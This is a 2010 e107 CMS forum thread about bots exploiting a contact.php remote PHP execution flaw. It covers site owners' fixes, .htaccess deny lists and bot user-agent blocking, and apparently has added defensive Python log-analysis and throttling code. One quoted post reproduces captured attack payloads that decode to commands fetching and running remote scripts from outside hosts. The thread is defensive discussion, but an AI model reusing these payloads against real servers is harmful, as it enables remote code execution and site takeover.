Contact form - Attack - Fixes

e107 CMS » Forums » e107 v1.x Support » Core Code Support
BillyBoy0823
Jun 28 2010, 03:17PM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 504
Don't PM me. You could have told me Dragonflycms WAS a derivative of Nuke, which had always been a security nightmare.

I'm not part of the development team, but I still don't appreciate you coming here and trashing a CMS I enjoy using and developing with while you go phishing for new users of YOURS. You would be better off getting MORE reviews than 11 for over 4 years added to your site and getting your cms listed at opensourcecms.org

Move on to the next CMS...
skate323k137
Jun 28 2010, 05:01PM
Registered Member #57342
Joined: Jun 28 2010, 04:53PM
Posts: 1
I found making a modsecurity2 rule that denies the user agent 'casper bot search' blocks a lot of the inbound hammering of contact.php. Also, if the devs don't have copies of "CASPER RFI CRACK Bot v1.1" let me know. I retained a copy of it; it mentions e107 all over the place.
[ Edited Jun 28 2010, 05:06PM ]
septor
Jun 28 2010, 07:05PM
  • e107 Site administrator
  • e107 Security Team
  • e107 Support Team
  • e107 Documentation Team
Registered Member #37
Joined: Aug 11 2002, 03:20AM
Location: United States
Posts: 2647
DJMaze wrote ...

septor wrote ...

DJMaze wrote ...

This bug is heavily exploited at the moment.

I have a list of all infected servers that try to compromise our server: dragonflycms.org/Forums/viewtopic/t=24361/

It fails since we don't use e107/contact.php but, it does bring Apache to its knees.

Thank you for this bug.


If you don't use e107 the fault of your server getting destroyed is not the blame of this community or this software. Saying anything else is stupid at best. You cannot be affected by an exploit that exists in a file you have never even had on your web server. Better take a look at all the other crap you have installed.



I didn't blame you and yes our server still runs on a P3 with 512MB RAM nicely until 160+ IPs started bashing us with 50 POST requests per second to contact.php which our Apache couldn't handle (8000+ page requests) to pass through our error.php.

So yes it's our crappy error.php which logs all problems that occur, sorry that we log problems for security detection.

I apologize that I notified this community of this security issue caused by the v0pCr3w and others.

Here are some POST requests data for the developers:
[author_name] => [php]echo(base64_decode("Qnlyb2VOZXQ=")).php_uname().shell_exec(base64_decode("bHdwLWRvd25sb2FkIC1hIGh0dHA6Ly83a3MuaHUvY3liZXIuanBnIGNsYXNzLnBocDt3Z2V0IGh0dHA6Ly83a3MuaHUvY3liZXIuanBnIC1PIGNsYXNzLnBocDtjZCAvdmFyL3RtcDt3Z2V0IGh0dHA6Ly93d3cuc2lpZC5jYS9lMTA3X3NvdW5kL2Nzcy5sb2c7cGVybCBjc3MubG9nO3JtIC1yZiBjc3MubG9nKjtjZCAvdmFyL3RtcDtsd3AtZG93bmxvYWQgaHR0cDovL3d3dy5zaWlkLmNhL2UxMDdfc291bmQvY3NzLmxvZztwZXJsIGNzcy5sb2c7cm0gLXJmIGNzcy5sb2cq"));die();[/php]

[author_name] => [php]echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();[/php]

[author_name] => [php]eval(base64_decode('...'));die;[/php]


[edit] Also note the security advisory listed at:
osvdb.org/show/osvdb/65291
php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html




It would appear your "server" is not equipped to handle the needs of a website that gets more than 2 visitors in a day. Perhaps instead of spending all your time developing a trashy fork of *nuke you should be purchasing better hardware so your server doesn't crash under the pressure of a normal website.

Throwing all that aside, I stand by my original statement: claiming your website was dropped (aka DDoS, which can happen to any site via any means and based on the fact that you're using a terrible CMS to begin with I seriously doubt the "problem" this CMS is having is even remotely related) by an exploit to a file (that has been fixed) in this CMS is stupid.


Edit: I would also look into some sort of request throttling, as allowing 50 requests a second from 1 connection is idiotic and will get your site torn down regardless of the file being called if 160+ persons are doing it.
[ Edited Jun 28 2010, 07:09PM ]
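septor's edit mentions request throttling as the missing piece on DJMaze's side. The following Python class is an added example, not code from this thread or from e107: a per-client sliding-window throttle that serves at most `limit` requests per `window` seconds and refuses a client for `ban_seconds` once it exceeds that. It is driven by constructed traffic in which one address sends 50 POSTs in a single second (the rate DJMaze reported) while a normal visitor sends three spaced-out requests. The limits, addresses and timings are assumptions.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Per-client throttle: at most `limit` requests in any `window` seconds.
    A client that exceeds the limit is refused for `ban_seconds`, so the
    server answers its flood with the cheapest possible response instead of
    running the requested script. Limits are assumptions for the example."""

    def __init__(self, limit=10, window=1.0, ban_seconds=60.0):
        self.limit = limit
        self.window = window
        self.ban_seconds = ban_seconds
        self.history = defaultdict(deque)   # ip -> timestamps of served requests
        self.banned_until = {}              # ip -> time the ban expires

    def allow(self, client_ip, now):
        """True to serve the request, False to refuse it. `now` is a clock in seconds."""
        if self.banned_until.get(client_ip, 0.0) > now:
            return False                    # still banned: refuse without any other work
        q = self.history[client_ip]
        while q and now - q[0] >= self.window:
            q.popleft()                     # drop timestamps that fell out of the window
        if len(q) >= self.limit:
            self.banned_until[client_ip] = now + self.ban_seconds
            q.clear()
            return False
        q.append(now)
        return True


def simulate(limiter, requests):
    """Feed (timestamp, ip) pairs through the limiter in time order.
    Returns {ip: {"served": n, "refused": m}} so the effect can be checked."""
    stats = defaultdict(lambda: {"served": 0, "refused": 0})
    for t, ip in sorted(requests):
        stats[ip]["served" if limiter.allow(ip, t) else "refused"] += 1
    return dict(stats)


def constructed_traffic():
    """Constructed sample: one bot at 50 requests/second, one ordinary visitor.
    Addresses are RFC 5737 documentation ranges, not real hosts."""
    bot = [(i * 0.02, "192.0.2.10") for i in range(50)]
    visitor = [(0.5, "203.0.113.5"), (5.0, "203.0.113.5"), (10.0, "203.0.113.5")]
    return bot + visitor


if __name__ == "__main__":
    limiter = SlidingWindowLimiter(limit=10, window=1.0, ban_seconds=60.0)
    for ip, counts in simulate(limiter, constructed_traffic()).items():
        print(ip, counts)
```

With these settings the bot gets its first ten requests served and the remaining forty refused, while the visitor is never touched. In production this logic belongs in front of the application (an Apache module such as mod_evasive, or a firewall rule), because even a refused request still costs the server an accepted connection and a short response.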
adamcole99
Jun 28 2010, 11:54PM
Registered Member #57351
Joined: Jun 28 2010, 11:39PM
Posts: 1
The best fix I found was to take the form off my site completely. I'm now looking for a simple alternative that is more robust, but I don't get many genuine contacts anyway.
dimante
Jun 29 2010, 04:45AM
Registered Member #22233
Joined: Nov 10 2005, 10:09AM
Posts: 49
I have removed the contact.php file altogether but I still have many requests in user tracker: [-link-]

Ideas?
C6Dave
Jun 29 2010, 05:22AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
Read [-link-] on .htaccess
Chibi-Pa_Sempai
Jun 30 2010, 10:17PM
Registered Member #50172
Joined: Mar 04 2009, 08:01AM
Posts: 33
Ok I did get rockarolla. That was a couple of weeks ago. I just found a backwater site I had forgotten about had been eliminated and all kinds of files placed instead. Now I am getting the contactus.php attack. It's from Casper Bot Search and Dex Bot Search. From what I saw in other forums it's happening all over. I can not believe someone is hitting all kinds of sites looking for one or two specific files.

Recently some of my site visitors have said their antivirus programs would not let them on the site. Since I run linux it's a non-issue for me. So I renamed contact us since I don't use it. Hope this gets fixed soon.
Chibi-Pa_Sempai
Jun 30 2010, 10:27PM
Registered Member #50172
Joined: Mar 04 2009, 08:01AM
Posts: 33
Thank god for the hostgator fellows being smarter than I. They found the Iframe in the config.php. I did not get any funky files as far as I know. But we will see if this slows them down some.
Nowwhat
Jun 30 2010, 11:20PM
  • e107 Support Team
Registered Member #38024
Joined: Jul 05 2007, 12:08PM
Location: Europe (France)
Posts: 1729
Chibi-Pa_Sempai wrote ...
...
Recently some of my site visitors have said their antivirus programs would not let them on the site. Since I run linux its a non issue for me....

Linux-based web servers couldn't care less if they serve executable files (or other dangerous content) that can only 'execute' on Windows PCs.
An antivirus will (should) detect the file (content) - even if it's being served by your bread toaster.

Remember: it's the message that is important, not the nature of the messenger.
AndyP
Jul 01 2010, 10:52AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
A load of my e107 sites are getting hit on the contact.php file. I deleted this file weeks ago when I read about the problem on here and have since added the required code to my .htaccess files.
I have this evening contacted my hosts to see if they could also try and block the attacks and I have pasted their reply below.
Very unhelpful, and I suppose it's only a matter of time before the attacks increase and my websites get suspended by the hosts.

--
Hello Andy,

Thank you for contacting SiteGround HelpDesk.

I am afraid that your request cannot be fulfilled. As you probably know you are hosted on a shared server and if we block a particular IP address a client might complain that access to the site is limited. Thus I will recommend you to revise the access logs for your domain and limit the IP addresses in question via the cPanel Area -> IP deny manager. This way these IP addresses will be blocked for your account and they will not be able to access it.

If you need further help, do not hesitate to contact us again.

Best Regards,

Stanislav.I
Technical Support Team
C6Dave
Jul 01 2010, 11:33AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
You can bypass the IP deny manager once you have added 1 IP to ban as it lists them in the .htaccess

All you need to do is paste a list into .htaccess under the one created via cPanel

like this:

deny from 90.216.195.92
deny from 90.209.111.1
deny from 213.239.200.199
deny from 212.129.63.8
deny from 212.117.187.100
deny from 208.96.213.149
deny from 201.45.57.142
deny from 142.22.16.55
deny from 122.128.100.21
deny from 120.28.64.94
deny from 88.198.3.10
deny from 78.46.88.142
deny from 66.132.251.111
deny from 64.25.54.72

Much faster way to do it.

But they aren't being helpful are they?

No such problems with fusednetwork.com
AndyP
Jul 01 2010, 11:51AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
2dopey wrote ...

You can bypass the IP deny manager once you have added 1 IP to ban as it lists them in the .htaccess

All you need to do is paste a list into .htaccess under the one created via cPanel

like this:

deny from 90.216.195.92
deny from 90.209.111.1
deny from 213.239.200.199
deny from 212.129.63.8
deny from 212.117.187.100
deny from 208.96.213.149
deny from 201.45.57.142
deny from 142.22.16.55
deny from 122.128.100.21
deny from 120.28.64.94
deny from 88.198.3.10
deny from 78.46.88.142
deny from 66.132.251.111
deny from 64.25.54.72

Much faster way to do it.

But they aren't being helpful are they?

No such problems with fusednetwork.com


Thanks.
I also use fusednetwork for one of my bigger sites and they are SUPERB. In fact my site is hosted on the same server as [-link-] and we had problems yesterday and they sorted things really quickly.
Brilliant hosts and would recommend them to anyone.
In fact I may move a lot more of my sites to them eventually
AndyP
Jul 01 2010, 12:04PM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
Having updated my .htaccess file as suggested I am getting messages like below in my error log in my cpanel.
This may be a stupid question, but I'm not very clever on this sort of thing, but as they are now getting the access denied message, is it safe to assume that despite them still trying to hit the contact.php file that my server won't be overloaded?

[Thu Jul 1 13:58:04 2010] [error] [client 74.208.96.47] client denied by server configuration: /home/retrospe/public_html/contact.php
Brad R
Jul 01 2010, 12:22PM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
Although this will greatly reduce the load on your server, it is still possible that the sheer number of attacks will overload it. The server can be 100% occupied just sending back the "403 Forbidden" replies.
AndyP
Jul 01 2010, 12:29PM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
Brad R wrote ...

Although this will greatly reduce the load on your server, it is still possible that the sheer number of attacks will overload it. The server can be 100% occupied just sending back the "403 Forbidden" replies.


Thanks for the info, at least it is of some comfort.
Do you think these attacks will ever stop?
After all, I no longer have the contact.php file on my server/website. Surely they will realise this eventually, give up and/or try somewhere else.
Brad R
Jul 01 2010, 12:47PM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
Unfortunately, they're not that bright. They just keep hammering away, as though after the first 1000 failed tries, the 1001st will magically work.
AndyP
Jul 02 2010, 12:30AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
I have done a complete upgrade and fresh re-install of e107 v0.7.22 and I am still experiencing repeated attempts to access the contact.php file.

Obviously they can’t hack the site because I’m running v0.7.22, but I thought the repeated attempts to access contact.php would have stopped once I upgraded my site.

Why are they still trying to access contact.php and how can I stop it?

I have made the changes to .htaccess as suggested and when they try to access contact.php they get the denied access message. However, I would like to stop them hitting my site completely as otherwise eventually the server will overload with their repeated attempts, regardless of whether I'm running v0.7.22 or not.

This could go on forever, even if I move server or use a completely different CMS.
BillyBoy0823
Jul 02 2010, 01:37AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 504
AndyP,

Brad R wrote ...

Unfortunately, they're not that bright. They just keep hammering away, as though after the first 1000 failed tries, the 1001st will magically work.



Think of a drunk going to gogle.com and he's not seeing the google page, so he keeps hitting refresh. He KEEPS hitting refresh, and you can't do a thing to stop him. Other than redirect him to something the server can do quickly, like display a blank page. Or, until a firewall blocks them from even getting there.

Hopefully someone will sober up and realize they are not getting what they want, and will use the resources for something else.

I really doubt changing the CMS or server will be more than temporary. Other CMS's are also being exploited. Just search for "{CMS name} Exploit" and look at the results count.

And one server, may be more or less secure than the next. Changing the IP address will do about the same, but they will hunt you down.

I am a conspiracy theorist and often wonder if the competition is up to no good (been there).

Here's a thread I started on a good article I read.

[-link-]
[ Edited Jul 02 2010, 01:39AM ]
C6Dave
Jul 02 2010, 02:51AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
ChicksHateMe wrote ...


Think of a drunk going to gogle.com and he's not seeing the google page, so he keeps hitting refresh. He KEEPS hitting refresh, and you can't do a thing to stop him. Other than redirect him to something the server can do quickly, like display a blank page.

Whole point is, it's not a person, but an automated script that will never get tired of trying...
Brad R
Jul 02 2010, 03:04AM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
AndyP wrote ...
Why are they still trying to access contact.php and how can I stop it?

I have made the changes to .htaccess as suggested and when they try to access contact.php they get the denied access message. However, I would like to stop them hitting my site completely as otherwise eventually the server will overload with their repeated attempts, regardless of whether I'm running v0.7.22 or not.

This could go on forever, even if I move server or use a completely different CMS.


Like I said, they're not that bright. They've got your domain name pegged as "an e107 site" and they're going to keep hitting it until they crack it. The fact that you're patched against their exploit won't stop them. Getting rid of e107 entirely won't stop them. Moving to a different server won't stop them. The only way you can get rid of them is to change to a new domain name, and not redirect your old domain name to the new one -- and you probably don't want to do that.

It's out of your (and our) control. This will go on until either (a) the ISPs hosting the bots realize what's going on, and start closing them down, or (b) those ISPs start getting blacklisted from the Internet in general, by having their IPs blocked at the routers. Don't expect (b) to happen any time soon... if at all. For (a) to happen, someone needs to collect the IP addresses of the attackers and report the abuse back to the originating ISPs. Many someones need to do this. And even then, some of the ISPs may not care.

Bottom line, we may need to live with this until the script kiddies get bored.
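Several posts in this thread describe things a site owner can do from the logs: deny the bot user agents (skate323k137's modsecurity rule), paste a `deny from` list into .htaccess (C6Dave), read the "client denied by server configuration" error-log lines (AndyP), and collect attacker IPs to report abuse to the originating ISPs (Brad R, above). The Python script below is an added example that ties those together; it is not code from this thread or from e107. Over constructed sample log lines it parses Apache combined-format access entries and error-log entries in the format AndyP quoted, summarises per IP how many bot requests arrived and the peak requests per second, prints one report line per address, and emits an Apache 2.2-style .htaccess fragment. The addresses (RFC 5737 documentation ranges), the paths and the exact .htaccess layout are assumptions; the user-agent strings are the two named in the thread.

```python
import ipaddress
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample of Apache combined-format access log lines (not real traffic).
ACCESS_LOG = """\
192.0.2.10 - - [01/Jul/2010:13:58:04 +0100] "POST /contact.php HTTP/1.1" 200 512 "-" "casper bot search"
192.0.2.10 - - [01/Jul/2010:13:58:04 +0100] "POST /contact.php HTTP/1.1" 200 512 "-" "casper bot search"
192.0.2.10 - - [01/Jul/2010:13:58:05 +0100] "POST /contact.php HTTP/1.1" 200 512 "-" "casper bot search"
198.51.100.7 - - [01/Jul/2010:13:58:05 +0100] "POST /contact.php HTTP/1.1" 200 512 "-" "Dex Bot Search"
203.0.113.5 - - [01/Jul/2010:13:58:06 +0100] "GET /news.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed lines in the format of the cPanel error-log entry quoted in the thread.
ERROR_LOG = """\
[Thu Jul 1 13:58:04 2010] [error] [client 192.0.2.10] client denied by server configuration: /home/example/public_html/contact.php
[Thu Jul 1 13:58:07 2010] [error] [client 198.51.100.7] client denied by server configuration: /home/example/public_html/contact.php
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
ERROR_RE = re.compile(r'\[client (?P<ip>[0-9.]+)\] client denied by server configuration: (?P<path>\S+)')

TARGET = "contact.php"
BAD_AGENTS = ("casper bot search", "dex bot search")  # the user agents named in the thread


def parse_access(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append(e)
    return events


def is_bot_hit(e):
    """A POST to contact.php, or any request carrying one of the known bot user agents."""
    return (e["method"] == "POST" and e["path"].endswith(TARGET)) or e["ua"].lower() in BAD_AGENTS


def suspicious_ips(events):
    """Per-IP hit count and peak requests per second: the numbers an abuse report needs."""
    hits = Counter()
    per_second = defaultdict(Counter)
    for e in events:
        if is_bot_hit(e):
            hits[e["ip"]] += 1
            per_second[e["ip"]][e["ts"]] += 1
    return {ip: {"hits": n, "peak_per_second": max(per_second[ip].values())}
            for ip, n in hits.items()}


def denied_counts(text):
    """Count 'client denied by server configuration' entries per IP in the error log."""
    return Counter(m.group("ip") for m in ERROR_RE.finditer(text))


def htaccess_deny_block(ips):
    """Apache 2.2-style .htaccess (assumed layout): refuse contact.php outright, refuse
    the bot user agents via mod_setenvif, and refuse the listed source addresses,
    sorted numerically so repeated runs produce a stable, diffable list."""
    lines = [
        '<Files "contact.php">',
        "    Order allow,deny",
        "    Deny from all",
        "</Files>",
        "",
        'SetEnvIfNoCase User-Agent "casper bot search" bad_bot',
        'SetEnvIfNoCase User-Agent "dex bot search" bad_bot',
        "Order allow,deny",
        "Allow from all",
        "Deny from env=bad_bot",
    ]
    lines += ["deny from %s" % ip for ip in sorted(ips, key=ipaddress.ip_address)]
    return "\n".join(lines) + "\n"


def abuse_report(summary, denied):
    """One line per offending IP, suitable for pasting into an abuse complaint."""
    return ["%s: %d bot requests, peak %d/s, %d denied by .htaccess"
            % (ip, d["hits"], d["peak_per_second"], denied.get(ip, 0))
            for ip, d in sorted(summary.items(), key=lambda kv: ipaddress.ip_address(kv[0]))]


if __name__ == "__main__":
    summary = suspicious_ips(parse_access(ACCESS_LOG))
    print("\n".join(abuse_report(summary, denied_counts(ERROR_LOG))))
    print()
    print(htaccess_deny_block(summary))
```

Run against a real access log and error log instead of the constructed strings, the report lines give the per-ISP evidence Brad R describes, and the printed fragment can be pasted under the entry cPanel's IP deny manager creates, as C6Dave suggests. Blocking by user agent only helps while the bot keeps announcing itself, and, as Brad R notes, every refused request still costs the server a connection and a 403, so the deny list reduces the load rather than removing it.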